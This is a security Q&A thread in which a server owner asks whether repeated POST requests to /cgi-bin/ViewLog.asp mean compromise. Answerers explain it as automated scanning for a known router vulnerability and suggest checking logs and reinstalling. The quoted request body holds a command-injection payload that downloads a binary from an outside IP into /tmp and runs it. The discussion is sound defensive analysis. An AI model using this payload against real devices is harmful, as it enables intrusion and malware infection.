Constant POST request spam to /cgi-bin/ViewLog.asp endpoint

Question

I've got a DigitalOcean server that I use for different temporary servers. Lately I've found that sometimes I get a constant spam of the following requests:

POST http://127.0.0.1/cgi-bin/ViewLog.asp

Headers:
    Host: 127.0.0.1
    Connection: keep-alive
    Accept-Encoding": gzip, deflate
    Accept: */*
    User-Agent: B4ckdoor-owned-you
    Content-Length: 176
    Content-Type: application/x-www-form-urlencoded

Body:
{
    " remote_submit_Flag": "1", // Space is not a typo
    "remote_syslog_Flag": "1",
    "RemoteSyslogSupported": "1",
    "LogFlag": "0",
    "remote_host": ";cd /tmp;wget http://152.44.44.68/d/xd.arm7;chmod 777 xd.arm7;./xd.arm7;rm -rf xd.arm"
}

Which does not really bother me since I run Node.js servers only. What bothers me is the repetition of the attack and the Host header (although I believe this one can be faked).

I've used to run a DNS server that defaulted to Google DNS, that I left unattended for some time and it gathered 1.5TB of traffic in one month. The named -v shows version 9.11.3-1ubuntu1.12-Ubuntu.

Is the server compomised?

fraxinus · Answer

It looks like an automated search for vulnerable machines over the 'net.
The "127.0.0.1" host can be a faked part of the http request that comes from some other address. 127.0.0.1 (localhost) gets less security checks in a lot of networked systems.
It is rather unusual, but not absolutely pointless for someone that already can execute code on your machine to scan for vulnerabilities from inside - he is already in.
You may as well look for HTTP access log and see how this request is logged.

As for DNS: unless you know what you are doing, don't run public DNS.
p.s. no one can say if your machine is compromised, but since it is for temporary use, it is better to reinstall it.

lab9 · Answer

You are right about the fact that he host header can easily be faked, however I assume that you've got the POST http://127.0.0.1/cgi-bin/ViewLog.asp right from yours logs - and that indicates that the requests come from (or via) your localhost indeed.
Some attacker code might try to exploit:

https://www.exploit-db.com/exploits/43884

which is aimed at (rebranded) Zyxel and Billion routers. This attack is unlikely to cause any harm to you as you're obviously not running your node.js stuff on a router, however the sole fact that something uncontrolled seems to originate from (or be forwarded by) your localhost should be investigated.

Constant POST request spam to /cgi-bin/ViewLog.asp endpoint

2 Answers

Add your own answers!

Related Questions

What are the risks of using TLS 1.0 for web applications?

Why should browser security be prioritized?

Does having Frontend and Backend on the same port any consequences?

Jenkins malicious process identification

Is there a vulnerability in subdomain redirection, similar to Open Redirect

Does encrypted content in a database need to be signed?

If I am using a VPN with allowed multiple connections can each user/device be able to view traffic of the other user?

WhatsApp account got “hacked”/hijacked?

iCloud deletion

Difference between Zeek (Bro) and Snort 3

Help Understanding PHP Reverse Shells

What, if anything, are the consequences of temporarily enabling and then disabling WebRTC in Firefox?

Refresh token using a separate auth server?

Is the perfect MITM attack possible?

Why did “terminal commands” never get a version of SQL “parameterized queries”?

What attack vectors does arbitrary JS on a user profile allow?

How safe is opening any website on new browser tab?

Processing Exceptionally High Volume Singular Flows

MAC address of router changes when i connect to VPN

Extrapolating home address of a visitor when they click on an e-mail phishing link (Mr Robot)

Ask a Question